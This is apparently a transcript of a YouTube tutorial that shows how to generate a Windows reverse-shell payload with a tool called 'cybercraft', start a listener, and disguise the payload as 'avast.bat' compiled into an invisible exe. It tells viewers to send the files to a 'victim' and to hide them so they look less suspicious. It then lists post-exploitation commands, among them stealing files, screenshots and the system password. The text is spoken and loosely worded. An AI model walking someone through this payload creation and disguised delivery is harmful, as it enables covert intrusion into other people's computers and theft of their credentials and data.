friends, welcome to my YouTube channel cybercraft. And today we are going to do a video about post exploitation. As you can see on my screen, post exploitation refers to any action taken after a session is opened. A session is an open shell from a successful exploit or brute force attack. So the first thing we are going to do, we are going to create a payload and start the listener, and after the session is opened, we'll continue with post exploitation. So you know the drill. Go to your command prompt, and if you haven't installed the cybercraft framework, the link is in the description below. Clone this clone this git page, and then you will get the same result. Now I have already installed it, so I don't want to install it twice. I'm going to navigate to the directory where I installed it, desktop cybercraft. So first we are going to create a payload, python cybervenom py -p. We are going to do a reverse shell. So Windows cyber shell rev TCP stands for reverse TCP, then --lhost. So I don't remember my IP address, so let's check it again. Command prompt. If you are in a Linux machine, it will be terminal. I'm in a Windows machine, so if you are on a Linux machine, type ifconfig. If you are on a Windows machine, type ipconfig. Now my IP address is 192.168.1.3, and my I'm going to use 2009 as usual. No, 2008. So the next thing is -f. It stands for file name. So I'm going to name it payloads are awesome .py, and you can see a disclaimer popping up in a few seconds. Agree to this, and this will take some time to generate the backdoor. So we'll go and start the listener. We are going to navigate to the cybercraft directory, which is located in desktop cybercraft, then python cybercraft py. So payload must started by now. It's generating it, as you can see here. There must be a file called payloads are cool py. Payloads are awesome.py. You can see the exe will be generated shortly. Okay, it has begun. Okay, the cybercraft framework has started. Let's load all the tools. So there will be some basic commands we will run. So the first one is capturing the screenshot. The second one will be some basic Windows commands like mkdir and things. Some special commands too. Okay, it's done. Now set payload. We are going to set the payload to Windows cyber shell rev TCP, and type help. And these are the optional things. I'll show you what this does. Options module. This command, if you run this command, this shows the this will show the commands we must run in order to complete this module. So they are lhost, lport, exploit, main. This won't work. Don't worry, it's just a bug. I will fix that. The first thing we are going to do is set the lhost, which is 192.168.1.3. The next one is lport. I set it to 2008. So now run. Okay, the listener has started. Let's see. The payload is being generated. When it finishes, I will be sure to notify. The payload generation has been completed. Now the listener is listening for incoming connections. Now we just have to run this file. So you know the drill. We are going to create a batch file and blah blah blah. Now we are going to create a batch file the usual way. If you are viewing this channel for the first time, if you are, so I'm going to start this from scratch. If you are a Windows user, type this command. So I will maximize the screen a little bit so you can see it. Type null into, I'm going to name it avast.bat. As always, the extension should be bat or cmd. I will settle with bat. And if you are a Linux user, you can just type touch. You can just type touch avast.bat. Easy as always. So the screen is maximized. I'm going to minimize it. Okay. Now the avast.bat has been created in the cybercraft directory. I'm going to move it to the disk directory. Actually, it's a folder. So open this using your favorite text editor. I'm going to open it with Notepad++. And then after some time you will see a blank file. So you just have to type the name of the exe that we just created. Payloads are awesome. Payloads are awesome .exe. So its payloads are awesome. Okay, so save it, exit the text editor, launch the bat to exe converter. Link is in the description below. Open it. And it will take some time depending on your PC's performance. Let's open it again. Okay, here's the bat to exe converter. I'm going to maximize the screen. Select the batch file avast.bat. Under the visibility, change it to an invisible application. This is very important. Temporary files do not delete, and that this is very important too. Miscellaneous overwrite existing files. This is not important. And architecture, if your victim is a 32-bit, leave this as it is. If your victim is 64-bit, change it to 64-bit. And then click on compile. And then it is finished. You can delete this batch file. You can see a brand new exe file here. So you just have to open it. you must send these both files to the victim. If you want to make it less suspicious, you can hide this file. Payloads are awesome. You can toggle this under the attributes to check the hidden option and apply, then OK, and it fades away. Don't worry, I didn't delete it, it's still there, but it's hidden. Now the avast, we just have to run this avast exe. No, payloads are cool. So it is running in the background. It will take some time to give you a session, and I'll be sure to notify when it does. After a few seconds, the reverse shell got connected. Now this is where the post exploitation will begin. So run the command options dot session. Oh sorry, it must be help, not help. So sorry, help. Okay, here. And here are the commands, and you can see there's a usage, and this is the special or not. What this means is if these commands are special or not. So these are the commands. This command downloads the file from a target. This command uploads a file to a target. This command shutdowns the machine. This command restarts the machine. This command exits the session. This command changes the directory. This command shows this help message. This command pops up an alert. This command retrieves the system information. This command gets the system password. This command takes a screenshot from the target. So we are going to test all of this out. Download command. I am going to download the file. I am going to add a file here. I am going to move the payloads are awesome.spec file into this directory, and then go to this. Sorry about that. Go to this session. First, what is the directory where this shell is installed? It must be in the this directory. Yes. Now we are going to download the payloads are awesome.spec file. So just type download D capital payloads are awesome.spec. Okay, then you can see download successful. Now if you go to this, you can see payloads are awesome.spec file has been downloaded. So again we are going to upload the payloads are awesome.spec file into the this directory. So in order to do that,